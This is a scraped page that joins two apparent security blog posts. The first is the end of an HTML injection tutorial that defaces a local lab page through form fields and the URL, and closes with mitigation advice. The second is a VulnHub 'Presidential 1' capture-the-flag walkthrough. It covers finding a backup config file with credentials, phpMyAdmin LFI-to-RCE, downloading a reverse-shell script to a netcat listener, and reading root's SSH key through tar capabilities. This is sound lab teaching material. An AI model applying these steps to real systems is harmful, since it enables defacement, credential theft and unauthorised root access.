Now just do the similar amendments into the Proxy tab and hit the “Forward”button. From the below image you can see that, we ‘ve defaced this web page too through its validated fields.




Let’s check out the code snippet to see where the developer had made input validation:


From the below image you can see that, here the developer had made a function as “hack” for the variable data and even he had decoded the “<” and “>” to “<” and“>” for $data and $input respectively, further he used the inbuilt PHP function urldecodeover for $input to decode up the URL.



From the below image you can see that the developer implemented the function hack over at the name field.




Reflected HTML POST


Similar to the “GET webpage”, the “Name” and the “Feedback”fields are vulnerable here too, since the POST method has been implemented, thus the form data won’t be displayed in the URL.


Let’s try to deface this webpage again but this time we’ll add up an image rather than a static text as



From the below image, you can see that the “Ignite technologies logo” has been placed up over the screen, thus the attacker here can even inject other media formats such as videos, audios or the gifs.




Reflected HTML  Current URL


Can a web-application be vulnerable to HTML Injection with no input fields over on the web page?

Yes, it's not necessary to have an input filed like a comment box or search box, some applications display your URL over on their webpages and they might be vulnerable to HTML Injection, as in such cases, the URL acts as the input field to it.



From the above image, you can see that the current URL is being displayed over on the web-page as http://192.168.0.16/hack/html_URL.php”.So let’s take over to this advantage and see what we can grab.

Tune in your “burpsuite”and capture the ongoing HTTP Request



Now let’s manipulate this request with :

/hack/html_URL.php/

Hey_are_you_there?


Click on the Forward button to check the result over on the browser.



Great!! From the below image you can see that we have successfully defaced the website by simply injecting our desired HTML code into the web application's URL.



Let’s have a look over its code and see how the developer managed to get the current URL over on the screen


Here the developer used the PHP global variable as $_SERVER in order to capture up the current page URL. Further, he amended the hostname with “HTTP_HOST” and the requested resource location to the URL with “REQUEST_URI” and placed it all in the $url variable.



Coming to the HTML section he simply set echo with the $urlvariable without any specific validation, in order to display the message with the URL.




Mitigation Steps

·         The developer should set up his HTML script which filters the metacharacters from user inputs.

·         The developer should implement functions to validate the user inputs such that they do not contain any specific tag that can lead to virtual defacements.


Source:

            https://www.w3schools.com/ 


                https://www.javatpoint.com/

Presidential: 1 Vulnhub Walkthrough

0
0

Today we are going to solve another boot2root challenge called "Presidential - 1".  It's available at VulnHub for penetration testing and you can download it from here.

The credit for making this lab goes to Thomas Williams. Let's get started and learn how to successfully break it down.

Level: Hard

Penetration Testing Methodology

Recognition

§  Netdiscover

§  Nmap

Enumeration

§  Gobuster

§  Forgotten backup files

Exploiting

  • John The Ripper

  •  RCE via LFI from phpMyAdmin

Privilege Escalation

§  Abuse of Linux Capabilities

§  Capture the flag

Walkthrough

Recognition

We are looking for the machine with netdiscover


 netdiscover -i ethX



So, let's start by running map to all ports with OS detection, software versions, scripts and traceroute.

nmap      -A-p-  192.168.10.172



Enumeration

We entered the web service and visited the different sections and found an email with the domain name.




We edit the file "/etc/hosts" and associate the IP address with the domain found.




We start Gobusterand configure it to find files by specific extensions.  

We find a file called "config.php.bak", these files usually contain database access credentials.




File content "config.php.bak":




Exploiting

Back to Gobuster, this time we'll pass a "medium directory" dictionary with the "vhost" option, this way we'll list sub-domains.

We'll get a single result:




We access the address of the subdomain, find an access panel to "phpMyAdmin", insert the credentials obtained in the previous file and find the password of the user "admin". It is likely that the user will reuse the same credential for other corporate services.




We saved the hash in a file and cracked it with John The Ripper and the famous "rockyou" dictionary.




The next step, will be to list the version of "phpMyAdmin" and find some exploit that can serve to gain access to the interior of the machine.




We found thisexploit that allows us to execute commands from a SQL statement and embedding a file (LFI) with our session cookie.

We make a test by executing a phpinfo() as a proof of concept.




Result PoC:




It works! It's time to complicate it, we will create a file called "m3n0shell.sh" with a reverse shell, we will raise a server with Python and we will execute a sequence of three commands so that it downloads it, gives it execution permissions and executes it.

And don't forget to have a netcat listening to port         4444!!!




If all goes well, we'll have a reverse shell. We authenticate ourselves with the credentials of the user "admin", we use Python to get an interactive shell, we read the flag of “user.txt” and the file “notes.txt”.



Privilege Escalation (root)

We list the available capabilities, we see that we have "+EP" to the tarS binary. This binary allows us to compress any file on the system without being root. Therefore, once we have it compressed, we will only have to decompress it to be able to read the content of the file.

Having said this, we can now compress the file "id_rsa", decompress it and we will be able to obtain visibility to the content.




We copy the content of "id_rsa", give it permissions and connect as the "root" user through the SSH service.

Once inside, we can read the flag.




Author: David Utónis Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.  Contacted onLinkedIn and Twitter.
Viewing all 1788 articles
Browse latest View live




Latest Images